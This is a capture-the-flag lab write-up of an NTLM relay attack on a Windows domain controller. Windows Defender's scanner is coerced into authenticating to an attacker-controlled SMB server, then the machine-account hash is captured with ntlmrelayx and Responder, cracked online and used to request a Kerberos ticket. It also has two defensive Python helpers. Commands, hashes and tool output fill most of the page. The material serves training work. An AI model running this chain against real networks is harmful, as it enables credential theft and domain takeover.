NTLM Relay
As discovered previously, the target system appeared to have the LmCompatibilityLevel registry value set to 2, resulting in the use of the insecure NTLMv1 (or Net-NTLMv1) protocol for network authentication. It is known to be obsolete and vulnerable to cracking. This was also picked up by PEAS.
Here, I will attempt to leverage Windows Defender to authenticate to an arbitrary SMB server that I control. Windows Defender, by default, runs with SYSTEM privileges. Much like Unix's SUID binaries, the execution will be made in the security context of SYSTEM.
MpCmdRun.exe is a command-line tool provided by Windows Defender to interact with the AV solutions on board, including Defender itself. It supports scanning a file on a remote (UNC) path with the -Scan flag.
I will first need to locate the binary and check through the SMB configurations.
MpCmdRun.exe
*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> ls -Path C:\ -Include MpCmdRun.exe -Recurse -ErrorAction SilentlyContinue
Directory: C:\Program Files\Windows Defender
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/4/2021 5:42 AM 377648 MpCmdRun.exe
Directory: C:\Windows\WinSxS\amd64_windows-defender-service_31bf3856ad364e35_10.0.14393.4283_none_3b5ff297b161c9de
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/4/2021 5:42 AM 377648 MpCmdRun.exe
The binary is present in two different locations. I will go with the one in the C:\Program Files directory.
SMB configuration
It is just as important to enumerate the target system's SMB setup, for both the client and the server configuration.
Server Configuration
*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> Get-SmbServerConfiguration | Select EnableSMB1Protocol, EnableSMB2Protocol, EnableSecuritySignature, RequireSecuritySignature
EnableSMB1Protocol EnableSMB2Protocol EnableSecuritySignature RequireSecuritySignature
------------------ ------------------ ----------------------- ------------------------
True True True True
Based on the Get-SmbServerConfiguration output above, both SMBv1 and SMBv2 are enabled, and message signing is enabled and required. This, however, only applies to the server configuration (the current system acting as an SMB server); it isn't necessarily the case when the target system becomes a client of an external SMB server.
*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> cmd /c reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters
EnableAuthenticateUserSharing REG_DWORD 0x0
ServiceDll REG_EXPAND_SZ %SystemRoot%\system32\srvsvc.dll
ServiceDllUnloadOnStop REG_DWORD 0x1
NullSessionPipes REG_MULTI_SZ srvsvc
autodisconnect REG_DWORD 0xf
enableforcedlogoff REG_DWORD 0x1
enablesecuritysignature REG_DWORD 0x1
requiresecuritysignature REG_DWORD 0x1
restrictnullsessaccess REG_DWORD 0x1
AdjustedNullSessionPipes REG_DWORD 0x3
DisableCompression REG_DWORD 0x1
AutoShareServer REG_DWORD 0x0
NullSessionShares REG_MULTI_SZ backup
Guid REG_BINARY C01465E6BE462A44BE312DA9D5256049
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters\FsctlAllowlist
The registry values for the SMB server configuration are located under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters. As shown above, message signing is enabled and required (enablesecuritysignature and requiresecuritysignature are both 0x1).
Client Configuration
For client-specific SMB configuration, I can use the Get-SmbClientConfiguration PowerShell cmdlet.
*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> Get-SmbClientConfiguration | Select EnableInsecureGuestLogons, EnableSecuritySignature, RequireSecuritySignature
EnableInsecureGuestLogons EnableSecuritySignature RequireSecuritySignature
------------------------- ----------------------- ------------------------
True True False
As shown above, message signing is enabled but NOT required on the client side. Additionally, insecure guest logons (EnableInsecureGuestLogons) are enabled.
*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> cmd /c reg query HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManWorkstation\Parameters
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManWorkstation\Parameters
AccountDomainId REG_SZ 0 0 0 0 0 5 21 2702878673 795188819 444038987
Domain REG_SZ WORKGROUP
DomainId REG_SZ
EnablePlainTextPassword REG_DWORD 0x0
EnableSecuritySignature REG_DWORD 0x1
RequireSecuritySignature REG_DWORD 0x0
ServiceDll REG_EXPAND_SZ %SystemRoot%\System32\wkssvc.dll
ServiceDllUnloadOnStop REG_DWORD 0x1
This can also be checked through the registry. SMB message signing is enabled (EnableSecuritySignature is set to 0x1) but NOT required (RequireSecuritySignature is set to 0x0). This means that while message signing is allowed, it's not mandatory.
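As an added example (Python, not from the original writeup), a small auditor that reads the same three registry settings this section walks through, in the layout that reg query prints them, and turns them into findings with the hardened value. The LanManServer and LanManWorkstation values mirror the output above; the Lsa line is constructed, since the page only states that LmCompatibilityLevel is 2.

```python
import re

# Constructed sample in `reg query` layout: the LanManServer/LanManWorkstation values mirror
# the page; the Lsa line is constructed (the page only states LmCompatibilityLevel is 2).
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters
    enablesecuritysignature    REG_DWORD    0x1
    requiresecuritysignature    REG_DWORD    0x1
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManWorkstation\Parameters
    EnableSecuritySignature    REG_DWORD    0x1
    RequireSecuritySignature    REG_DWORD    0x0
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
    LmCompatibilityLevel    REG_DWORD    0x2
"""

SRV = r"system\currentcontrolset\services\lanmanserver\parameters"
WKS = r"system\currentcontrolset\services\lanmanworkstation\parameters"
LSA = r"system\currentcontrolset\control\lsa"
KEY_RE = re.compile(r"^HKEY_LOCAL_MACHINE\\(.+)$", re.IGNORECASE)
DWORD_RE = re.compile(r"^\s*(\S+)\s+REG_DWORD\s+0x([0-9a-fA-F]+)\s*$")

def parse_reg_query(text):
    """Map each key path (lower-cased, without the HKLM prefix) to its REG_DWORD values."""
    values, current = {}, None
    for line in text.splitlines():
        key = KEY_RE.match(line.strip())
        if key:
            current = key.group(1).lower()
            values.setdefault(current, {})
            continue
        val = DWORD_RE.match(line)
        if val and current is not None:
            values[current][val.group(1).lower()] = int(val.group(2), 16)
    return values

def audit(values):
    """Return (finding, fix) pairs for the relay / NTLMv1 preconditions; empty means hardened."""
    findings = []
    if values.get(SRV, {}).get("requiresecuritysignature", 0) != 1:
        findings.append(("SMB server signing not required", "LanManServer RequireSecuritySignature=1"))
    if values.get(WKS, {}).get("requiresecuritysignature", 0) != 1:
        findings.append(("SMB client signing not required; outbound sessions can be relayed",
                         "LanManWorkstation RequireSecuritySignature=1"))
    # Levels 0-2 still send NTLMv1 responses; 3+ send NTLMv2 only (absent value defaults to 3).
    level = values.get(LSA, {}).get("lmcompatibilitylevel", 3)
    if level < 3:
        findings.append((f"LmCompatibilityLevel={level} sends crackable NTLMv1 responses",
                         "Lsa LmCompatibilityLevel=5 (NTLMv2 only, refuse LM and NTLMv1)"))
    return findings
```

Run against the sample it reports exactly the two weaknesses this writeup goes on to abuse: client-side signing not required and NTLMv1 responses being sent.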
Execution
┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ impacket-ntlmrelayx -t apt.htb.local -ntlmchallenge 1122334455667788 -of ntlmrelayx --interactive
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Protocol Client SMTP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMB loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
[*] Servers started, waiting for connections
I can start an arbitrary SMB server with impacket-ntlmrelayx. The -ntlmchallenge flag sets a fixed server challenge for offline cracking and is technically unnecessary here, as I plan on RELAYING the authentication; --interactive opens an interactive SMB session.
The command above will relay the authentication back to the host (apt.htb.local).
*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> cmd /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 3 -File \\10.10.16.8\blahblah
Scan starting...
Using the MpCmdRun.exe binary, I can attempt to scan an arbitrary file located on the arbitrary SMB server that I set up above. This will cause Defender to make an outbound SMB connection to that server. The execution will be made as SYSTEM, as Defender runs with SYSTEM privileges.
There is the hit.
Interestingly, it came from the IPv4 address.
Additionally, impacket-ntlmrelayx immediately relayed the authentication right back to the target system via the IPv6 address.
This is ONLY possible because the SMBv1 protocol was used without message signing (signing is NOT supported for SMBv1).
It then opened up an interactive SMB client shell session on the 127.0.0.1:11000 socket.
┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ nc 127.0.0.1 11000
Type help for list of commands
#
The session was established using impacket-smbclient, and I can connect to it.
# shares
backup
IPC$
NETLOGON
SYSVOL
This would be the end of the operation in the usual case, where the C$ SMB share is available, because this session is made with the SYSTEM credential (APT$).
However, the target SMB server does not have the default C$ share.
Therefore, although the NTLM relay attack itself is a success, I would need to find other ways to compromise the system.
Capture The Hash
┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ impacket-ntlmrelayx -smb2support -ntlmchallenge 1122334455667788 -of ntlmrelayx
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Protocol Client SMTP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMB loaded..
[*] Running in reflection mode
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
[*] Servers started, waiting for connections
I can start an arbitrary SMB server again, this time with the -smb2support flag to enable the SMBv2 protocol.
This would likely cause the target to use message signing, as it's ENFORCED, which means NO RELAY attack.
However, I can still grab the Net-NTLMv1 authentication hash; the -of flag does exactly that.
*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> cmd /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 3 -File \\10.10.16.8\blahblah
Same thing.
There is the hit.
impacket-ntlmrelayx, by default, tries to relay the authentication back to the sender (10.10.10.213), but this will fail for 2 reasons:
- The firewall rule doesn't allow inbound connections to 10.10.10.213:445
- Message signing is ENFORCED, so it will fail regardless of the firewall status
Nonetheless, it must have collected and logged the Net-NTLMv1 authentication string sent by the target system.
It should be available in the ntlmrelayx_ntlm file, as noted from the -of flag.
┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ cat ntlmrelayx_ntlm
apt$::HTB:b8d1e66de359095d00000000000000000000000000000000:14fa843c7935b9bb1b02644c4057e2ccb197eb1d28a789f4:1122334455667788
There is the Net-NTLMv1 authentication string. hashcat was unable to crack this with known wordlists, so I will opt to use an external resource.
Password Cracking
There is an online tool that provides a very detailed breakdown of a given authentication token.
Additionally, a Net-NTLMv1 hash can be cracked via crack.sh for free.
This service is the best when it comes to cracking Net-NTLMv1 hashes free of charge.
There is a submission section that outlines the formatting. I will follow it and clean up the hash string.
From this:
APT$::HTB:b8d1e66de359095d00000000000000000000000000000000:14fa843c7935b9bb1b02644c4057e2ccb197eb1d28a789f4:1122334455667788
To this:
NTHASH:14fa843c7935b9bb1b02644c4057e2ccb197eb1d28a789f4
Crack.sh has successfully completed its attack against your NETNTLM handshake. The NT hash for the handshake is included below, and can be plugged back into the ‘chapcrack’ tool to decrypt a packet capture, or to authenticate to the server: Token: 1122334455667788$14fa843c7935b9bb1b02644c4057e2ccb197eb1d28a789f4 Key: d167c3238864b12f5f82feae86a7f798 This run took 32 seconds. Thank you for using crack.sh, this concludes your job.
A moment after sending the submission, I received an email with the cracked NT hash of the APT$ account: d167c3238864b12f5f82feae86a7f798
Validation
┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ impacket-gettgt 'htb.local/apt$@apt.htb.local' -no-pass -hashes :d167c3238864b12f5f82feae86a7f798 -dc-ip $IPv6
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Saving ticket in APT$@apt.htb.local.ccache
Validated. A TGT was generated for the machine account, APT$.
Now that I have compromised the machine account of the DC host, I can dump the entire domain's hashes with the DCSync attack.
Hash Capturing with Responder
┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ sudo responder -I tun0 --disable-ess --lm -v
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [ON]
Force ESS downgrade [ON]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.16.8]
Responder IPv6 [dead:beef:4::1006]
Challenge set [1122334455667788]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-L7UD3FJ0RA4]
Responder Domain Name [1ZJI.LOCAL]
Responder DCE-RPC Port [47841]
[+] Listening for events...
Responder can also be used for capturing hashes.
In fact, it's much easier, and it also supports force-downgrading ESS and LM hashing (--disable-ess / --lm), which makes the captured hash easier to crack.
APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
There it is.
ESS/SSP is DISABLED.
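As an added example (Python, not part of the writeup nor of impacket or Responder), a triage helper for the two capture lines above: it checks the field lengths that distinguish a Net-NTLMv1 line from NTLMv2, reads the ESS marker out of the LM field (so an analyst can tell whether the ESS downgrade took effect), and flags the fixed 1122334455667788 server challenge, a useful hunting signal in packet captures because capture tools hard-code it. Both sample lines are taken from this page; the first is rebuilt from its two halves.

```python
import re

# Constructed from the two capture lines shown on the page (ntlmrelayx first, then Responder).
CAPTURES = [
    "apt$::HTB:" + "b8d1e66de359095d" + "0" * 32
    + ":14fa843c7935b9bb1b02644c4057e2ccb197eb1d28a789f4:1122334455667788",
    "APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:"
    "95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788",
]
# Fixed server challenges hard-coded by capture tools (ntlmrelayx -ntlmchallenge, Responder).
TOOL_CHALLENGES = {"1122334455667788"}
HEX = re.compile(r"^[0-9a-fA-F]+$")

def parse_netntlmv1(line):
    """Split a user::domain:lm:nt:challenge line; ValueError if it is not NTLMv1-shaped."""
    parts = line.strip().split(":")
    if len(parts) != 6 or parts[1] != "":
        raise ValueError("not a user::domain:lm:nt:challenge line")
    user, _, domain, lm, nt, chal = parts
    # NTLMv1: two 24-byte responses and an 8-byte server challenge (NTLMv2 lines fail here).
    if (len(lm), len(nt), len(chal)) != (48, 48, 16) or not all(HEX.match(x) for x in (lm, nt, chal)):
        raise ValueError("field lengths do not match NTLMv1")
    return user, domain, lm.lower(), nt.lower(), chal.lower()

def triage(line):
    """Classify one capture line the way an analyst would when reviewing what was leaked."""
    user, domain, lm, nt, chal = parse_netntlmv1(line)
    # NTLMv1-ESS puts an 8-byte client nonce followed by 16 zero bytes in the LM field.
    ess = lm[16:] == "0" * 32
    return {
        "account": f"{domain}\\{user}",
        "machine_account": user.endswith("$"),   # e.g. the DC's own account, a DCSync-grade secret
        "variant": "NTLMv1-ESS" if ess else "NTLMv1",
        "lm_equals_nt": lm == nt,                # NTLM response copied into the LM field; no LM hash sent
        "tool_challenge": chal in TOOL_CHALLENGES,
    }

def triage_all(lines):
    """Triage every line; unparsable ones are reported rather than silently dropped."""
    report = []
    for line in lines:
        try:
            report.append(triage(line))
        except ValueError as err:
            report.append({"error": str(err), "line": line[:40]})
    return report
```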